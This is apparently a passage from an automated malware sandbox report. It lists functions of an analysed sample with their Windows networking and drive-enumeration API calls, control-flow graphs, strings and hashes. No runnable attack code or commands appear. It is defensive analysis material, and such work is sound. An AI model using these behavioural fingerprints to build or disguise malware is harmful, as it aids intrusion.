                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                            • API String ID: 98920635-842387772
                                                            • Opcode ID: a6189a033f64eda1e1f57d99837cc8a91dabaa3472396a28859298fc66369134
                                                            • Instruction ID: 90df6564f65610a2f42b467b61e07ce9866a0b567db5c6a36cf17e3e50362d54
                                                            • Opcode Fuzzy Hash: a6189a033f64eda1e1f57d99837cc8a91dabaa3472396a28859298fc66369134
                                                            • Instruction Fuzzy Hash: C1114876E1035137D6105F6AAC5AFAB3B89DFC2734F440D2DF818923E2D2118D5596E1
                                                            Function 0742029F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 222COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1790 742029f-74202a4 1791 74202a6-74202a7 1790->1791 1792 7420269-7420280 call 742028e 1790->1792 1793 7420267 1791->1793 1794 74202a9-742035f GetLogicalDrives 1791->1794 1797 7420285-7420288 1792->1797 1793->1792 1811 7420377-74205e0 1794->1811 1799 7420223-742027f 1797->1799 1800 742028a-742028c 1797->1800 1799->1797 1807 7420280 call 742028e 1799->1807 1807->1797
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: bcd03a39aaceb0ab6843353cc1963b8526b8af7bc5fb86f0c9426a9d48b13c74
                                                            • Instruction ID: fd7620936370637da21c25b89124eb38a51dc5d32e8a917cfa548b16340c4b1d
                                                            • Opcode Fuzzy Hash: bcd03a39aaceb0ab6843353cc1963b8526b8af7bc5fb86f0c9426a9d48b13c74
                                                            • Instruction Fuzzy Hash: C84113EB2AC131BF6201C0956B54AFA1BEDD5C7730BB1CD27F407C5A21E2944AAB7131
                                                            Function 0742028E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1839 742028e-742035f GetLogicalDrives 1849 7420377-74205e0 1839->1849
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 7ef0454cf36b264884b63de85acd5ac52849b311fe2d232645b3aa12e9bb09fc
                                                            • Instruction ID: 78589153d2cf7b719753ba22fcbb3655cc858e1e08b3693a37a2e321d748f7b5
                                                            • Opcode Fuzzy Hash: 7ef0454cf36b264884b63de85acd5ac52849b311fe2d232645b3aa12e9bb09fc
                                                            • Instruction Fuzzy Hash: 0241BEEB16C131BF6242C0856B50AFA16EEE5D7330BB0CD27F407C1A21E2940AAB7131
                                                            Function 006FA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1877 6fa150-6fa159 1878 6fa15f-6fa17b 1877->1878 1879 6fa250 1877->1879 1880 6fa249-6fa24f 1878->1880 1881 6fa181-6fa1ce getsockname 1878->1881 1880->1879 1882 6fa1f7-6fa214 call 6fef30 1881->1882 1883 6fa1d0-6fa1f5 call 6dd090 1881->1883 1882->1880 1888 6fa216-6fa23b call 6dd090 1882->1888 1890 6fa240-6fa246 call 704f40 1883->1890 1888->1890 1890->1880
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 006FA1C6
                                                            Strings
                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 006FA23B
                                                            • getsockname() failed with errno %d: %s, xrefs: 006FA1F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3358416759-2605427207
                                                            • Opcode ID: 6798e38285bbc9f6348fa76c83b149d6e14a8aadc4bf941a20345fc7df2c1dba
                                                            • Instruction ID: 77e328c758bbb4ce492a35bd147e1efe01528367eca14d10e5e63624ae273892
                                                            • Opcode Fuzzy Hash: 6798e38285bbc9f6348fa76c83b149d6e14a8aadc4bf941a20345fc7df2c1dba
                                                            • Instruction Fuzzy Hash: 0B21F871948284BAE7259B58DC42FF673BCEF81324F040615FA9853152FF32698A87E2
                                                            Function 006DD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1897 6dd5e0-6dd5ee 1898 6dd5f0-6dd604 call 6dd690 1897->1898 1899 6dd652-6dd662 WSAStartup 1897->1899 1905 6dd61b-6dd651 call 6e7620 1898->1905 1906 6dd606-6dd614 1898->1906 1900 6dd664-6dd66f 1899->1900 1901 6dd670-6dd676 1899->1901 1901->1898 1903 6dd67c-6dd68d 1901->1903 1906->1905 1911 6dd616 1906->1911 1911->1905
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 006DD65B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: if_nametoindex$iphlpapi.dll
                                                            • API String ID: 724789610-3097795196
                                                            • Opcode ID: 1eb9f94d9b90243544d3b10ae11369cc78661cd9243307957de0b31c381790f9
                                                            • Instruction ID: a47d6b86c0e7145ca647e5e6e3aa0a9478cdc280845b76a84b1d61234570d7eb
                                                            • Opcode Fuzzy Hash: 1eb9f94d9b90243544d3b10ae11369cc78661cd9243307957de0b31c381790f9
                                                            • Instruction Fuzzy Hash: C6012BD0D813C156EB117F3CAC173A625906B52308F44096ADC48D23D2F768C569C2E2
                                                            Function 0078AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0078AB9B
                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0078ABE4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocketsocket
                                                            • String ID:
                                                            • API String ID: 416004797-0
                                                            • Opcode ID: ec17cc3deb791a56879df0378e42c86781c90ab0cb53e3978dd9d377f85b0c5b
                                                            • Instruction ID: 5fff3c13547dc59aea0f0b593acae966f5840aec7e61ad9b54cf5c894e071043
                                                            • Opcode Fuzzy Hash: ec17cc3deb791a56879df0378e42c86781c90ab0cb53e3978dd9d377f85b0c5b
                                                            • Instruction Fuzzy Hash: 8DE1D270644301ABEB20DF14C885B6B77E5FF89314F044E2EF9988B291E779D944CB92
                                                            Function 074A0E5F Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$ZXZX$aZXj
                                                            • API String ID: 0-2157119310
                                                            • Opcode ID: eecbaf5b7d0422ea4cc2dc06feb6a26b76ed7273b39939a5f3f842b7c852bffd
                                                            • Instruction ID: 814e192a425b911d9c1c817df08d13ee0900b739a491fca28a2a295294351f3e
                                                            • Opcode Fuzzy Hash: eecbaf5b7d0422ea4cc2dc06feb6a26b76ed7273b39939a5f3f842b7c852bffd
                                                            • Instruction Fuzzy Hash: FC21B3DB19D1167DA10291555F55EFB2A2EE6E3B30E308827F802E6492F2D1494A5071
                                                            Function 07420399 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 45579907333c7edce9fc672b24cd93263b7474c3f0ddad51ef1fee0c92daddd8
                                                            • Instruction ID: 1af8554c987bdca6759727978cdaa5ae94c13d898c3394ce1c0252e41d2877db
                                                            • Opcode Fuzzy Hash: 45579907333c7edce9fc672b24cd93263b7474c3f0ddad51ef1fee0c92daddd8
                                                            • Instruction Fuzzy Hash: E3414BE755C2317FA20280555B506FB27EDD9DB6307B1CD67F407C9621E1840AAB7171
                                                            Function 074202CD Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 0031ffc41aa52b8faee6ceb76ff882588b432cb413d0656177972f29223e56f1
                                                            • Instruction ID: 61890d4b4e50395db18c1d457cbe04d50b204dadd4bbfe7150f2ad986a259631
                                                            • Opcode Fuzzy Hash: 0031ffc41aa52b8faee6ceb76ff882588b432cb413d0656177972f29223e56f1
                                                            • Instruction Fuzzy Hash: 0341E6E726C131BFA34281595B506FB17EDD9C7230BB1CD6BF407C6622E2944AAB7231
                                                            Function 07420312 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 68e98fea6476867c52cfb9dee4328909dd63edb4b3070f8b6ff53f6b383fff87
                                                            • Instruction ID: 6b3f57f1464382920278703885dd01cced4ec538c84d51f7ebd2e0ae37eef5dc
                                                            • Opcode Fuzzy Hash: 68e98fea6476867c52cfb9dee4328909dd63edb4b3070f8b6ff53f6b383fff87
                                                            • Instruction Fuzzy Hash: 5431E2E716C231BF6202C5595B50AFB27EDD5CB230BB1CD27F407C6A21E2944AABB131
                                                            Function 0742031A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 172COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: a737aac5f061df6025504bd6a7dbacae7bf43127098937db99989784185e377d
                                                            • Instruction ID: fe52522fe0a32553fde593a97d9543706ba459cf082866d34c7cf3d8c23fc2a3
                                                            • Opcode Fuzzy Hash: a737aac5f061df6025504bd6a7dbacae7bf43127098937db99989784185e377d
                                                            • Instruction Fuzzy Hash: A631E4E716C231BF6202C5555B50AFA17EDD5D7330BB1CD27F407C6621E2944AABB231
                                                            Function 0742033C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: eee9820d1e16b1dcd848deb6213b7aa6a53717125643159bd9a7d3ab96358cb8
                                                            • Instruction ID: d35122f9600ae47cf19b01827f647c73fa55cb4e5a59c8c5684e910f45879b16
                                                            • Opcode Fuzzy Hash: eee9820d1e16b1dcd848deb6213b7aa6a53717125643159bd9a7d3ab96358cb8
                                                            • Instruction Fuzzy Hash: B131A1EB26C131BF624280595B50AFB16EED5D7330BB1CD27F407C5A21E6D44AAB7131
                                                            Function 0742034E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE(?,07420079,07420079), ref: 07420356
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597170262.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7420000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 9021de8162f56ceacbdbccce2bdaed3e8c5238c6fc3651a4971344e16b3af6ac
                                                            • Instruction ID: 446b8486aef850ecd13e77a46024493881abce83098f636f7d11091fdeb63651
                                                            • Opcode Fuzzy Hash: 9021de8162f56ceacbdbccce2bdaed3e8c5238c6fc3651a4971344e16b3af6ac
                                                            • Instruction Fuzzy Hash: 0A3190E766C131BE724280596B50AFA16EED5DB730BB1CD27F407C5A21E2C84AAB7131
                                                            Function 006C78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID: FD %s:%d sclose(%d)
                                                            • API String ID: 2781271927-3116021458
                                                            • Opcode ID: 1c3888170c46f6aec0752f00d28fbaea1bc85f2ced760d48ed344b2b2766581d
                                                            • Instruction ID: 3b4e308efc487d4a77edce1b344e6034fc1df9e3faeb06a7ea87a2127b370dd4
                                                            • Opcode Fuzzy Hash: 1c3888170c46f6aec0752f00d28fbaea1bc85f2ced760d48ed344b2b2766581d
                                                            • Instruction Fuzzy Hash: 69D05E32A192216B852069996C48D9BABA9DEC6F60F060C6DF94067304D2209D018BE6
                                                            Function 0078B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0078B29E,?,00000000,?,?), ref: 0078B0BA
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00773C41,00000000), ref: 0078B0C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastconnect
                                                            • String ID:
                                                            • API String ID: 374722065-0
                                                            • Opcode ID: dd5225d8a6b47f87880de540eae86d2b921740cd33e804c4a52f6303154deca0
                                                            • Instruction ID: db411ee0e7fe9af9b12bbe23a4b1248c7dd13319b341c05327ba14b82cc733bf
                                                            • Opcode Fuzzy Hash: dd5225d8a6b47f87880de540eae86d2b921740cd33e804c4a52f6303154deca0
                                                            • Instruction Fuzzy Hash: 0901D8363442009BCA206A68CC84F6BB799FF89364F140B54F978A32E1D72AED508752
                                                            Function 074A0E2D Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$aZXj
                                                            • API String ID: 0-1138735442
                                                            • Opcode ID: a97fff8aba8a8711a4c8a31f8d21b3b000696acb085499702687bc9bd5c05dc1
                                                            • Instruction ID: 5a8e5780ee445d13963f04d14ab0590abe4d85049a8e181a4251fa99b9086a52
                                                            • Opcode Fuzzy Hash: a97fff8aba8a8711a4c8a31f8d21b3b000696acb085499702687bc9bd5c05dc1
                                                            • Instruction Fuzzy Hash: 992162EB29D1567CB54291912F54EFB6A2EE2E3B30F31882BF803E5456F2D14A4F6071
                                                            Function 074A0E7F Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QZaZXj$aZXj
                                                            • API String ID: 0-1138735442
                                                            • Opcode ID: 5edf4cd4b1dffd44bb7a768220a40916d8a7ff4e4bb3dc22d36b96925d056740
                                                            • Instruction ID: f7ed83250a7f08e27ba19e1bc4790fe5ec738f43e784bce2800cf3f0c210ef8b
                                                            • Opcode Fuzzy Hash: 5edf4cd4b1dffd44bb7a768220a40916d8a7ff4e4bb3dc22d36b96925d056740
                                                            • Instruction Fuzzy Hash: 461105EB29D211BDA10295515B54EF62A2EE7E3B30F30882BF803E6452F2D1494A5071
                                                            Function 074A0EE3 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
